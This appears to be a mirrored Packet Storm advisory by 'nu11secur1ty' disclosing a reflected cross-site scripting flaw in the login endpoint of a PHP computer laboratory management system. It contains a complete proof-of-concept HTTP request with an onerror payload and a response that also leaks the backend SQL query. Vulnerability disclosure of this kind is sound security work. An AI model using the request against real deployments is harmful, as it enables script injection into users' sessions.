Computer Laboratory Management System 2024 1.0 Cross Site Scripting
2024-10-5 02:38:53 Author: packetstormsecurity.com(查看原文) 阅读量:3 收藏

## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure
## Author: nu11secur1ty
## Date: 00/04/2024
## Vendor: https://github.com/oretnom23
## Software:
https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette
## Reference: https://portswigger.net/web-security/cross-site-scripting

## Description:
The value of the username request parameter is copied into the HTML
document as plain text between tags. The payload ro2iz<img src=a
onerror=alert(1)>xggkt was submitted in the username parameter. This input
was echoed unmodified in the application's response.

STATUS: HIGH- Vulnerability

[+]Exploits:
- XSS-Reflected:
```xss
POST /php-lms/classes/Login.php?f=login HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqml
Origin: https://pwnedhost.com
X-Requested-With: XMLHttpRequest
Referer: https://pwnedhost.com/php-lms/admin/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128",
"Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 37

username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7

```
+ [Response]
```
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 08:27:39 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 177
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"incorrect","last_qry":"SELECT * from users where username =
'VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =
md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}

```

## Reproduce:
[href](https://www.patreon.com/nu11secur1ty)

## Demo PoC:
[href](https://www.patreon.com/nu11secur1ty)

## Time spent:
00:27:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


文章来源: https://packetstormsecurity.com/files/182007/clms202410-xss.txt
如有侵权请联系:admin#unsafe.sh